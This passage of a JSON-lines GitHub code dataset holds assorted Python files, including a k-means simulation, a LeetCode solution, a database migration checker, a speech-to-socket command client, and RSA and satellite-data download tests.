(num_of_unique_labels / num_of_labels) < 0.5 else False\n\n\nH = []\n# if the labels could only get few discrete values, we should obviously treat our problem as a\n# classification problem.\nif discrete:\n H.append(pu.logistic_regression(C, X_tr, y_tr))\n# otherwise - it should be treated as a regression problem\nelse:\n H.append(pu.lasso_regression(ALPHA, X_tr, y_tr))\n H.append(pu.linear_regression(X_tr, y_tr))\n\n\n# in order to check how well does the new hypothesis work, we shall calculate the error:\nfor h in H:\n tr_error = pu.loss_0_1(h, X_tr, y_tr)\n tst_error = pu.loss_0_1(h, X_tst, y_tst)\n print('training error: ', tr_error, ' test error: ', tst_error)\n\n\n","repo_name":"Tomer-Daloomi/test_project","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"18409580315","text":"from crosskbmom import *\nfrom math import floor\n\nfrom sklearn.datasets import make_blobs\nfrom kbmom.utils import *\nimport matplotlib.pyplot as plt\n\n\ndef bloc_size(prop_outliers, cste):\n return floor(log(cste) / log(1 - prop_outliers))\n\n\ndef bloc_nb(R, prop_outliers, cste, nb=None):\n if nb is None:\n nb = bloc_size(prop_outliers, cste)\n D = cste - 1 / 2 # (1-prop_outliers)**nb - cste # #\n return floor(log(10 / R) / (2 * D ** 2))\n\n\nclass Simulation():\n\n MU = np.array([[1, 4], [2, 1], [-2, 3]])\n\n # parameters for the simulation\n n_samples = 1200\n nb_outliers = 10\n outlier_degree = 20\n repetitions = 15\n\n all_rmse = []\n\n # Main loop on the sub sample size\n for coef_ech in np.arange(30, 130, 10):\n print(coef_ech, end='*')\n # Repetitions\n rmse = []\n for j in range(repetitions):\n # data simulation\n X, y_true = make_blobs(n_samples=n_samples, centers=MU, cluster_std=0.4)\n for i in range(nb_outliers):\n X[i, :] = outlier_degree * X[i, :]\n\n kmom_cross = CrossKbMOM(K=len(MU), coef_ech=coef_ech, nbr_blocks=50)\n kmom_cross.fit(X)\n y_kmom = kmom_cross.predict(X)\n\n map_kmom = mapping(y_true[nb_outliers:], y_kmom[nb_outliers:])\n rmse.append(RMSE(MU, kmom_cross.centers, map_kmom))\n\n all_rmse.append(rmse)\n print('RMSE')\n for name, x in zip(np.arange(30, 130, 10), all_rmse):\n print('sample size ', name, 'rmse', 
np.round(np.mean(x), 2))\n #print('centroids')\n #print(kmom_cross.centers.astype(np.int))\n\n plt.figure(figsize=(15, 8))\n plt.subplot(121)\n plt.plot(X[:, 0], X[:,1], '.')\n plt.title('Example of simulation case')\n plt.subplot(122)\n plt.violinplot(all_rmse)\n plt.title('Influence of the sample size of the block')\n plt.show()\n\n @classmethod\n def main(cls):\n pass\n\n\nif __name__ == '__main__':\n Simulation.main()\n","repo_name":"csaumard/kbMOM","sub_path":"kbMOM/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"70414409020","text":"from ..bussiness_objects import AccountingGetter, ResponseDealer\n\n\nclass AccountingLogic:\n \"\"\"\n Логика получения БО.\n \"\"\"\n\n def get_accounting(self, inn: str, token: str) -> dict:\n \"\"\"\n Логика метода GET /accounting\n \"\"\"\n ag = AccountingGetter(inn, token)\n accounting = ag.from_db()\n dealer = ResponseDealer()\n if accounting:\n response = dealer.accounting(data=accounting)\n else:\n ag.task_parse()\n response = dealer.in_queue()\n return response\n","repo_name":"gagpa/ms_accounting","sub_path":"app/bussiness_logics/accounting_logic.py","file_name":"accounting_logic.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"74700403899","text":"import multiprocessing\nimport ijson\nimport pymysql\nimport os.path\nimport copy\nfrom handle_type import handle_data\nfrom handle_columns import translate_columns_name, handle_columns, _get_columns_default\nfrom conf import (\n translate_table_name,\n get_columns_type,\n get_columns_info,\n dump_data_dir,\n dump_data_file,\n ignore_tables,\n)\n\npath_name = \"\"\ntable_name = \"\"\nfile_name = \"\"\n\ncol_type = {}\ncol_info = {}\ncolumns_default = {}\n\nuser = \"root\"\npassword = \"root\"\nhost = \"localhost\"\ndatabase = \"test\"\n\ndb = pymysql.connect(user=user, password=password, host=host, database=database)\n\ntotal = 0\n\n\ndef sql_test(row):\n sql_cols = copy.deepcopy(col_type)\n row = translate_columns_name(file_name, row)\n diff_columns = handle_columns(row, col_info, col_type, sql_cols, columns_default)\n\n if diff_columns[1]:\n # print(diff_columns)\n # print(row)\n return diff_columns\n\n diff_types = handle_data(row, sql_cols)\n if diff_types:\n return (\"diff_types\", diff_types)\n\n sql = \"INSERT INTO {0}({1}) VALUES {2};\".format(\n table_name, \",\".join(row.keys()), tuple(row.values())\n )\n return sql\n\n\ndef test_columns(row):\n sql_cols = copy.deepcopy(col_type)\n row = translate_columns_name(file_name, row)\n diff_columns = handle_columns(row, col_info, col_type, sql_cols, columns_default)\n\n if diff_columns[1]:\n # print(diff_columns)\n # print(row)\n return diff_columns\n\n return row\n\n\ndef test_pool(rows):\n pool = multiprocessing.Pool()\n async_result = pool.imap(sql_test, rows)\n for row in async_result:\n yield row\n\n pool.close()\n\n\ndef init(fil_name):\n global total, path_name, table_name, col_type, col_info, file_name, columns_default\n file_name = fil_name\n total = 0\n\n path_name = os.path.join(dump_data_dir, file_name + \".json\")\n table_name = translate_table_name(file_name)\n col_type = get_columns_type(db, database, table_name)\n col_info = get_columns_info(db, database, table_name)\n columns_default = _get_columns_default(file_name)\n\n\ndef diff_of_type(diff_columns, sql_cols):\n return {column: 
sql_cols[column] for column in diff_columns}\n\n\ndiff_columns_total = 0\n\n\ndiff_columns = set()\ndiff_types = set()\nmore_columns = set()\n\n\ndef test():\n    global total, diff_columns_total, diff_columns, diff_types, more_columns\n    with open(path_name) as f:\n        rows = ijson.items(f, \"results.item\")\n\n        for row in test_pool(rows):\n            # total += 1\n            # print(file_name, \":\", total)\n            if isinstance(row, tuple):\n                if row[0] == \"diff_columns\":\n                    diff_columns_total += 1\n                    diff_columns |= row[1]\n                elif row[0] == \"more_columns\":\n                    more_columns |= row[1]\n                elif row[0] == \"diff_types\":\n                    diff_types |= row[1]\n                continue\n\n            # print(row)\n\n    if not (diff_columns or diff_types or more_columns):\n        # no differences were recorded for this table, so there is nothing to report\n        return False\n\n    fi = \"*\" * 5 + file_name + \"*\" * 5 + \"\\n\"\n    diff_info_fp.write(fi)\n    diff_info_fp.write(\n        \"{0}\\tdiff_columns: {1}\\n\".format(diff_columns_total, diff_columns)\n    )\n    diff_info_fp.write(\"more_columns: {0}\\n\".format(more_columns))\n    diff_info_fp.write(\"diff_types: {0}\\n\".format(diff_types))\n    diff_info_fp.write(str(diff_of_type(diff_columns, col_type)) + \"\\n\\n\")\n    diff_info_fp.flush()\n\n\ndef test_all_dump_data():\n    dir = os.listdir(dump_data_dir)\n    bad_file_name = {}\n    good_file_name = []\n    for file_name in dir:\n        file_name = file_name.split(\".\")[0]\n        ignore_tables.extend(\n            [\"GoldLog\", \"Message\", \"Coupon\", \"Order\", \"LeanEngineSniper\", \"_User\"]\n        )\n        # this is good\n        ignore_tables.extend(\n            [\n                \"RechargeOrder\",\n                \"Invoice\",\n                \"WithdrawStatus\",\n                \"BusinessHours\",\n                \"MessageType\",\n                \"BeefStatus\",\n                \"LottoLog\",\n                \"OffineControl\",\n                \"MallOrderStatus\",\n                \"WithdrawPyramid\",\n                \"BeefPaymentType\",\n                \"MallBanner\",\n                \"BeefGoldLogType\",\n                \"CashLogType\",\n                \"GoldLogType\",\n                \"GiftLog\",\n                \"Alipay\",\n                \"CreditsType\",\n                \"MarketPrice\",\n                \"CrowdProductUsers\",\n                \"CouponRange\",\n                \"CouponDispatch\",\n                \"IncomeDetail\",\n                \"Discover\",\n                \"CommentBridge\",\n                \"CrowdStatus\",\n                \"Province\",\n                \"OrderStatus\",\n                \"Insurance\",\n                \"MallPaymentType\",\n                \"BankInfo\",\n                \"CommodityType\",\n                \"Retrospect\",\n                \"BusinessInfo\",\n                \"Beef\",\n                \"LjStore\",\n                \"Announcement\",\n                \"City\",\n                \"BeefCardSale\",\n                \"wxAccessToken\",\n                \"Cow\",\n            ]\n        )\n        if file_name in ignore_tables:\n            continue\n\n        try:\n            init(file_name)\n            if not test():\n                good_file_name.append(file_name)\n        except Exception as e:\n            # print('BAD',file_name)\n            bad_file_name[file_name] = e\n            continue\n\n    diff_info_fp.write(\"BAD_file_name: \\n\")\n    for i in bad_file_name:\n        diff_info_fp.write(str(i) + \"\\n\")\n    diff_info_fp.write(str(good_file_name))\n\n\ndef testcc():\n    for file_name in [\"GoldLog\", \"Message\", \"Coupon\", \"Order\", \"LeanEngineSniper\",\"_User\"]:\n        try:\n            init(file_name)\n            test()\n        except Exception:\n            s = \"Bad: \" + file_name + \"\\ndiff_columns:\\n\" + str(diff_columns) + \"\\ndiff_types: \\n\" + str(diff_types)\n            diff_info_fp.write(s)\n            diff_info_fp.flush()\n\n\nif __name__ == \"__main__\":\n    diff_info_fp = open(\"/home/pybeef/big_table\", \"a\")\n    try:\n        # test_all_dump_data()\n\n        # init('_User')\n        # test()\n        testcc()\n    finally:\n\n        diff_info_fp.close()\n","repo_name":"Iceber/migrate_data","sub_path":"test_columns.py","file_name":"test_columns.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} {"seq_id":"33231485613","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# GTFS config file for the 9 of 10 transitanalystisrael tools (TTM is separate) 
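\n#\n# the MAX_*_COUNT values below are assumed to be sanity caps on the number of rows read from the corresponding GTFS tables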
\n#\n\nMAX_STOPS_COUNT = 100000\nMAX_STOP_TIMES_COUNT = 100000000\nMAX_TRIPS_COUNT = 2000000\nMAX_SHAPES_COUNT = 50000000\nMAX_ROUTES_COUNT = 100000\nMAX_AGENCY_COUNT = 200\nMAX_CALENDAR_COUNT = 1000000","repo_name":"transitanalystisrael/TransitAnalystIsrael","sub_path":"root/gtfs_config.py","file_name":"gtfs_config.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"42236586272","text":"\"\"\"\nWe are given some website visits: the user with name username[i] visited the\nwebsite website[i] at time timestamp[i].\n\nA 3-sequence is a list of websites of length 3 sorted in ascending order by\nthe time of their visits. (The websites in a 3-sequence are not necessarily\ndistinct.)\n\nFind the 3-sequence visited by the largest number of users. If there is more\nthan one solution, return the lexicographically smallest such 3-sequence.\n\n \n\nExample 1:\n\nInput: username =\n[\"joe\",\"joe\",\"joe\",\"james\",\"james\",\"james\",\"james\",\"mary\",\"mary\",\"mary\"],\ntimestamp = [1,2,3,4,5,6,7,8,9,10], website =\n[\"home\",\"about\",\"career\",\"home\",\"cart\",\"maps\",\"home\",\"home\",\"about\",\"career\"]\n\nOutput: [\"home\",\"about\",\"career\"]\n\nExplanation: \nThe tuples in this example are:\n[\"joe\", 1, \"home\"]\n[\"joe\", 2, \"about\"]\n[\"joe\", 3, \"career\"]\n[\"james\", 4, \"home\"]\n[\"james\", 5, \"cart\"]\n[\"james\", 6, \"maps\"]\n[\"james\", 7, \"home\"]\n[\"mary\", 8, \"home\"]\n[\"mary\", 9, \"about\"]\n[\"mary\", 10, \"career\"]\nThe 3-sequence (\"home\", \"about\", \"career\") was visited at least once by 2 users.\nThe 3-sequence (\"home\", \"cart\", \"maps\") was visited at least once by 1 user.\nThe 3-sequence (\"home\", \"cart\", \"home\") was visited at least once by 1 user.\nThe 3-sequence (\"home\", \"maps\", \"home\") was visited at least once by 1 user.\nThe 3-sequence (\"cart\", \"maps\", \"home\") was visited at least once by 1 user.\n \n\nNote:\n\n3 <= N = username.length = timestamp.length = website.length <= 50\n1 <= username[i].length <= 10\n0 <= timestamp[i] <= 10^9\n1 <= website[i].length <= 10\n\nBoth username[i] and website[i] contain only lowercase characters.\n\nIt is guaranteed that there is at least one user who visited at least 3\nwebsites.\n\nNo user visits two websites at the same time.\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\nfrom itertools import combinations\n\n\nclass Solution:\n \"\"\"\n This question has a list of annoying gotchas. 
One of the worst questions\n I have encountered.\n\n * timestamps are not necessarily monotonically increasing\n * if a user visits the same 3-sequence more than once, its counted as 1\n because the question states \"visited by the most number of users\"\n * a 3-sequence is not ADJACENT visits, its the set of all permutations\n of visits by monotonically increasing timestamp\n \"\"\"\n\n def mostVisitedPattern(\n self, username: List[str], timestamp: List[int], website: List[str]\n ) -> List[str]:\n # keyed by user\n visits = defaultdict(list)\n\n # keyed by 3 tuple of websites\n sequences = defaultdict(lambda: 0)\n\n for user, time, site in zip(username, timestamp, website):\n visit = (site, time)\n visits[user].append(visit)\n\n for k in visits.keys():\n # sort by timestamp\n visits[k].sort(key=lambda x: x[1])\n\n # set of 3-length monotonically increasing site visits\n perms = set(combinations([rec[0] for rec in visits[k]], 3))\n\n for seq in perms:\n sequences[seq] += 1\n\n # (count, (\"w1\", \"w2\", \"w3\"))\n results = [(v, k) for k, v in sequences.items()]\n results.sort(reverse=True)\n\n final = [results[0][1]]\n max_count = results[0][0]\n\n # break ties with lexographic sort\n for i in range(1, len(results)):\n if results[i][0] == max_count:\n final.append(results[i][1])\n else:\n break\n\n final.sort()\n\n return list(final[0])\n\n\ndef test_lc1():\n usernames = [\n \"joe\",\n \"joe\",\n \"joe\",\n \"james\",\n \"james\",\n \"james\",\n \"james\",\n \"mary\",\n \"mary\",\n \"mary\",\n ]\n timestamps = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n websites = [\n \"home\",\n \"about\",\n \"career\",\n \"home\",\n \"cart\",\n \"maps\",\n \"home\",\n \"home\",\n \"about\",\n \"career\",\n ]\n\n result = Solution().mostVisitedPattern(\n username=usernames, timestamp=timestamps, website=websites\n )\n\n assert result == [\"home\", \"about\", \"career\"]\n\n\ndef test_lc2():\n u = [\"dowg\", \"dowg\", \"dowg\"]\n t = [158931262, 562600350, 148438945]\n w = [\"y\", \"loedo\", \"y\"]\n\n results = Solution().mostVisitedPattern(u, t, w)\n\n assert results == [\"y\", \"y\", \"loedo\"]\n\n\ndef test_lc3():\n u = [\"zkiikgv\", \"zkiikgv\", \"zkiikgv\", \"zkiikgv\"]\n t = [436363475, 710406388, 386655081, 797150921]\n w = [\"wnaaxbfhxp\", \"mryxsjc\", \"oz\", \"wlarkzzqht\"]\n results = Solution().mostVisitedPattern(u, t, w)\n assert results == [\"oz\", \"mryxsjc\", \"wlarkzzqht\"]\n\n","repo_name":"jmoyers/competitive","sub_path":"season1/1152.py","file_name":"1152.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"23243674319","text":"from matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom statsmodels.formula.api import ols\r\nimport statsmodels.formula.api as smf\r\nfrom statsmodels.tsa.vector_ar.var_model import VAR\r\nfrom scipy import stats\r\nimport statsmodels.graphics.api as smg\r\n\r\ndef xylabel(a,b):\r\n plt.xlabel(a)\r\n plt.ylabel(b)\r\n plt.grid(axis='y')\r\n\r\ndef angle(x1, x2):\r\n lx1 = np.sqrt(x1.dot(x1))\r\n lx2 = np.sqrt(x2.dot(x2))\r\n return x1.dot(x2)/(lx1*lx2)\r\n\r\nurl = \"../新汇总表.csv\"\r\ncsv_data = pd.read_csv(url, engine='python')\r\n\r\nxaxis = \"years\"\r\nmodel = ols('Engel ~ I(np.log(gdp_per_capita/food_cpi))+I(1/(gdp_per_capita/food_cpi)**2)', csv_data).fit()\r\nprint(model.summary())\r\nresult1 = model.predict(csv_data)\r\n\r\nplt.figure(figsize=(8, 4))\r\nxaxis = \"years\"\r\nxylabel(xaxis, \"Engel 
coef\")\r\n\r\nplt.plot(csv_data[\"years\"],csv_data[\"Engel\"], \"v-\", label='Engel')\r\nplt.plot(csv_data[\"years\"],result1, \"o-\", label=\"predict Engel 6\")\r\nplt.legend()\r\nplt.savefig(\"../改进一.png\")\r\nplt.clf()\r\n","repo_name":"ggpipi/Master-s_thesis_code","sub_path":"statsss.py","file_name":"statsss.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"24179490431","text":"import speech_recognition as sr\nimport time\nimport socket\n\nHOST = '192.168.0.138'\nPORT = 9500\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\nprint(\"Connection to \" + HOST + \" was successful\")\n\nword = ''\n# Record Audio\nwhile word != \"quit\":\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Say something!\")\n audio = r.listen(source)\n \n # Speech recognition using Google Speech Recognition\n try:\n # to use another API key, use `r.recognize_google(audio, key=\"GOOGLE_SPEECH_RECOGNITION_API_KEY\")`\n word = r.recognize_google(audio)\n print(\"You said: \" + word)\n if word == \"left\":\n print(\"LEFT\")\n word = word.encode()\n s.send(word)\n elif word == \"right\":\n print(\"RIGHT\")\n word = word.encode()\n s.send(word)\n elif word == \"shoot\":\n print(\"SHOOT\")\n word = word.encode()\n s.send(word)\n elif word == \"stop\" or word == \"quit\" or word == \"no\":\n word = \"STOP\"\n print(word)\n word = word.encode()\n s.send(word)\n break\n else:\n print(\"Not a command recognized by this program!\")\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n except KeyboardInterrupt:\n print(\"resetting all\")","repo_name":"Rjbeckwith55/PythonProjects","sub_path":"PythonApplication1/Google_Speech_Recognition_Send.py","file_name":"Google_Speech_Recognition_Send.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"17592584187","text":"import random\n\nclass Musica:\n def __init__(self, titulo, artista, prev=None, next=None):\n self.titulo = titulo\n self.artista = artista\n self.prev = prev\n self.next = next\n\nclass Playlist:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def adc_mus(self):\n titulo = input(\"\\nNome da música: \")\n while not titulo.strip():\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc1 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc1 == 'c':\n titulo = input(\"\\nNome da música: \")\n elif opc1 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n artista = input(\"\\nNome do artista: \")\n while not artista.strip():\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? 
(c/m)\")\n opc2 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc2 == 'c':\n artista = input(\"\\nNome do artista: \")\n elif opc2 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n new_node = Musica(titulo, artista)\n if not self.head:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.prev = self.tail\n self.tail.next = new_node\n self.tail = new_node\n print(f\"\\n\\033[1;32;40m{titulo} - {artista} adicionada a playlist!\")\n\n def apg_mus(self):\n titulo = input(\"\\nNome da música: \")\n while not titulo.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia. Tente Novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc3 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc3 == 'c':\n titulo = input(\"\\nNome da música: \")\n elif opc3 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida\") \n artista = input(\"\\nNome do artista: \")\n while not artista.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia. Tente Novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc4 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc4 == 'c':\n artista = input(\"\\nNome do artista: \")\n elif opc4 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n current_node = self.head\n while current_node:\n if current_node.titulo == titulo and current_node.artista == artista:\n if current_node.prev:\n current_node.prev.next = current_node.next\n else:\n self.head = current_node.next\n if current_node.next:\n current_node.next.prev = current_node.prev\n else:\n self.tail = current_node.prev\n print(f\"\\n\\033[1;31;40m{titulo} - {artista} deletada da playlist!\")\n return\n current_node = current_node.next\n print(\"\\n\\033[1;33;40mA música não está na playlist!\")\n\n def ver_playlist(self):\n if not self.head:\n print(\"\\n\\033[1;33;40mA playlist está vazia.\")\n return\n current_node = self.head\n print(\"\\n\\033[1;34;40mMúsicas na playlist:\")\n while current_node:\n print(f\"\\n\\033[1;32;40m{current_node.titulo} - {current_node.artista}\")\n current_node = current_node.next\n\n def shuffle(self):\n if not self.head:\n print(\"\\n\\033[1;33;40mA playlist está vazia!\")\n return\n musicas = []\n current_node = self.head\n while current_node:\n musicas.append(current_node)\n current_node = current_node.next\n random.shuffle(musicas)\n self.head = musicas[0]\n self.head.prev = None\n self.tail = musicas[-1]\n self.tail.next = None\n for i in range(len(musicas)-1):\n musicas[i].next = musicas[i+1]\n musicas[i+1].prev = musicas[i]\n print(\"\\n\\033[1;32;40mPlaylist embaralhada com sucesso!\")\n\n def busc_mus(self):\n buscar = input(\"\\nO que está procurando?: \")\n while not buscar.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia! Tente novamente: \")\n print(\"\\nDeseja continuar ou voltar para o menu? 
(c/m)\")\n opc5 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc5 == 'c':\n buscar = input(\"\\n\\033[1;37;40mO que está procurando?: \")\n elif opc5 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n print(\"\\n\\033[1;34;40mMúsicas na playlist:\")\n current_node = self.head\n if current_node == None: print(\"\\n\\033[1;33;40mA playlist está vazia!\")\n while current_node:\n if buscar in current_node.titulo or buscar in current_node.artista:\n print(f\"\\n\\033[1;32;40m{current_node.titulo} - {current_node.artista}\")\n current_node = current_node.next \n\ndef menu():\n print(\"\\n\\033[1;36;40m=====================================\")\n print(\" MENU:\")\n print(\"\\n1 - Adicionar música\")\n print(\"2 - Deletar música\")\n print(\"3 - Exibir playlist\")\n print(\"4 - Embaralhar playlist\")\n print(\"5 - Buscar na playlist\")\n print(\"6 - Sair do menu\")\n print(\"\\n=====================================\")\n\n while True:\n try:\n opc = int(input(\"\\n\\033[1;37;40mDigite o valor da sua opção: \"))\n if opc in range(1, 7):\n return opc\n print(\"\\n\\033[1;33;40mOpção inválida. Tente novamente.\")\n except ValueError:\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente.\")\n\nif __name__ == \"__main__\":\n playlist = Playlist()\n\nwhile True:\n opc = menu()\n if opc == 1:\n playlist.adc_mus()\n elif opc == 2:\n playlist.apg_mus()\n elif opc == 3:\n playlist.ver_playlist()\n elif opc == 4:\n playlist.shuffle()\n elif opc == 5:\n playlist.busc_mus() \n elif opc == 6:\n print(\"\\n\\033[1;34;40mAté a próxima!\")\n print(\"\\033[1;37;40m\")\n break ","repo_name":"NoemyT/Playlist_ed","sub_path":"Playlist_cd.py","file_name":"Playlist_cd.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10008032351","text":"import unittest\nfrom tests_all import TestSentinelHub\n\nfrom sentinelhub.data_request import AwsTileRequest, AwsProductRequest\n\n\nclass TestAwsSafeTile(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n cls.request = AwsTileRequest(data_folder=cls.OUTPUT_FOLDER, tile='10UEV', bands=['B01', 'B09', 'B10'],\n metafiles='metadata,tileInfo', time='2016-01-09', safe_format=True)\n cls.request.save_data(redownload=True)\n cls.filename_list = cls.request.get_filename_list()\n\n def test_return_type(self):\n self.assertTrue(isinstance(self.filename_list, list), \"Expected a list\")\n self.assertEqual(len(self.filename_list), 4, \"Expected a list of length 4\")\n\n\nclass TestAwsSafeProduct(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n cls.request = AwsProductRequest(data_folder=cls.OUTPUT_FOLDER, bands='B01', safe_format=True,\n product_id='S2A_OPER_PRD_MSIL1C_PDMC_20160121T043931_R069_V20160103T171947_'\n '20160103T171947')\n cls.data = cls.request.get_data(redownload=True)\n\n def test_return_type(self):\n self.assertTrue(isinstance(self.data, list), \"Expected a list\")\n self.assertEqual(len(self.data), 125, \"Expected a list of length 125\")\n\n\nclass TestPartialAwsSafeProduct(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n bands = 'B12'\n metafiles = 'manifest,preview/B02, datastrip/*/metadata '\n tile = 'T1WCV'\n cls.request = AwsProductRequest(data_folder=cls.OUTPUT_FOLDER, bands=bands,\n metafiles=metafiles, safe_format=True, tile_list=[tile],\n product_id='S2A_MSIL1C_20171010T003621_N0205_R002_T01WCV_20171010T003615')\n cls.data = cls.request.get_data(save_data=True, redownload=True)\n\n def 
test_return_type(self):\n self.assertTrue(isinstance(self.data, list), \"Expected a list\")\n self.assertEqual(len(self.data), 3, \"Expected a list of length 3\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"weizushuai/sentinelhub-py","sub_path":"tests/test_aws_safe.py","file_name":"test_aws_safe.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"23"} +{"seq_id":"72134293180","text":"from ...common import rsa\nimport unittest\nfrom os import path, remove\nfrom Crypto.PublicKey import RSA\n\nPUB_KEY_FILE = \"/tmp/key_file.pub\"\nPRIV_KEY_FILE = \"/tmp/key_file.priv\"\n\nclass RsaTest(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Initiate keys.\"\"\"\n rsa.generate_keys(PUB_KEY_FILE, PRIV_KEY_FILE)\n\n def test_pub_key_format(self):\n \"\"\"verify public key format\"\"\"\n assert path.exists(PUB_KEY_FILE) == 1\n\n file = open(PUB_KEY_FILE, \"r\")\n lines = file.readlines()\n file.close()\n\n assert \"-----BEGIN PUBLIC KEY-----\" in lines[0]\n assert \"-----END PUBLIC KEY-----\" in lines[-1]\n\n def test_priv_key_format(self):\n \"\"\"verify private key format\"\"\"\n assert path.exists(PRIV_KEY_FILE) == 1\n\n file = open(PRIV_KEY_FILE, \"r\")\n lines = file.readlines()\n file.close()\n\n assert \"-----BEGIN RSA PRIVATE KEY-----\" in lines[0]\n assert \"-----END RSA PRIVATE KEY-----\" in lines[-1]\n\n\n def test_load_public_key(self):\n \"\"\"test load\"\"\"\n key = rsa.load_key(PUB_KEY_FILE)\n assert type(key) is RSA._RSAobj\n key = rsa.load_key(PRIV_KEY_FILE)\n assert type(key) is RSA._RSAobj\n\n def test_encrypt_decrypt(self):\n \"\"\"test encryption and decryption\"\"\"\n pub_key = rsa.load_key(PUB_KEY_FILE)\n priv_key = rsa.load_key(PRIV_KEY_FILE)\n message = b\"Hello this is a test\"\n encrypted_message = rsa.encrypt_public_key(message, pub_key)\n decrypted_message = rsa.decrypt_private_key(encrypted_message, priv_key)\n assert decrypted_message == message\n\n def test_sign_verify(self):\n \"\"\"test sign and verify_sign\"\"\"\n pub_key = rsa.load_key(PUB_KEY_FILE)\n priv_key = rsa.load_key(PRIV_KEY_FILE)\n message = b\"Hello this is a test\"\n signed_message = rsa.sign(priv_key, message)\n assert rsa.verify_sign(pub_key, signed_message, message)\n\n def tearDown(self):\n \"\"\"remove temporary files.\"\"\"\n remove(PUB_KEY_FILE)\n remove(PRIV_KEY_FILE)\n","repo_name":"aussedatlo/pyticator","sub_path":"pyticator/tests/common/test_rsa.py","file_name":"test_rsa.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"39719284185","text":"import influxdb_client\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nimport constants as C\n\ndef write(climate_variable, value):\n\n bucket = C.influxdb_bucket\n org = C.influxdb_org\n token = C.influxdb_token\n url = C.influxdb_url\n\n client = influxdb_client.InfluxDBClient(\n url=url,\n token=token,\n org=org\n )\n\n write_api = client.write_api(write_options=SYNCHRONOUS)\n \n p = influxdb_client.Point(\"measurement\").tag(\"location\", \"Hyderabad\").field(\n climate_variable, value)\n write_api.write(bucket=bucket, org=org, record=p)\n","repo_name":"akshayrajp/ag10_sensor_code","sub_path":"writeToDB.py","file_name":"writeToDB.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"5238549451","text":"'''\r\nСоздано: Shubnikov 
